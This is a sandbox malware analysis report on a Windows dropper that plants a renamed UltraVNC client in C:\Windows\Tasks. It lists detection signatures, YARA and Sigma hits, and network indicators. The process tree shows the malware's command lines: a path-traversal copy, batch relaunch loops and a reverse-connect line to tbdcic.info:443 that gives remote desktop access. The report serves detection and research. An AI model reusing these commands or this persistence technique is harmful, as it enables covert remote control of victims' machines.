Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T8xrZb7nBL.exe

Overview

General Information

Sample name:T8xrZb7nBL.exe
renamed because original name is a hash value
Original sample name:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Analysis ID:1579878
MD5:1677bd5b561b890396ae1816066ca481
SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • T8xrZb7nBL.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\T8xrZb7nBL.exe" MD5: 1677BD5B561B890396AE1816066CA481)
    • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7616 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7776 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 7820 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 8080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 5256 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 7836 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 8048 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8112 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7712 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 1836 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 8328 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 8344 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 8704 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 8712 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8784 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 8852 cmdline: cmd /c "C:\Windows\Tasks\3889122.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • timeout.exe (PID: 8868 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • taskkill.exe (PID: 8900 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • timeout.exe (PID: 8928 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 8944 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 8960 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 9020 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 9032 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 9064 cmdline: timeout /t 600 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\browser_sn.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Windows\Tasks\Xv6Ya.d8LhTJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 19 entries
                  SourceRuleDescriptionAuthorStrings
                  37.2.browser_sn.exe.7ff790c30000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    24.0.browser_sn.exe.7ff790c30000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      35.2.browser_sn.exe.7ff790c30000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        28.2.browser_sn.exe.7ff790c30000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                          28.0.browser_sn.exe.7ff790c30000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                            Click to see the 3 entries

                            System Summary

                            barindex
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 8328, ProcessName: browser_sn.exe
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7724, TargetFilename: C:\Windows\Tasks\conhost.exe
                            Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, ProcessId: 8704, ProcessName: browser_sn.exe
                            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7460, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7552, ProcessName: cmd.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7460, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7552, ProcessName: cmd.exe
                            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 8328, ProcessName: browser_sn.exe
                            No Suricata rule has matched

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                            Source: T8xrZb7nBL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,24_2_00007FF790C5C210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,24_2_00007FF790CEA228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,24_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,24_2_00007FF790C35910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,28_2_00007FF790C5C210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,28_2_00007FF790CEA228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,28_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,28_2_00007FF790C35910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,24_2_00007FF790C56DD1
                            Source: Joe Sandbox ViewASN Name: RSHB-ASRU RSHB-ASRU
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3BB70 recv,24_2_00007FF790C3BB70
                            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                            Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                            Source: 77EC63BDA74BD0D0E0426DC8F80085060.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://forum.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ocsp.thawte.com0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                            Source: 2D85F72862B55C4EADD9E66E06947F3D0.15.drString found in binary or memory: http://x1.i.lencr.org/
                            Source: ReaderMessages.11.drString found in binary or memory: https://www.adobe.co
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
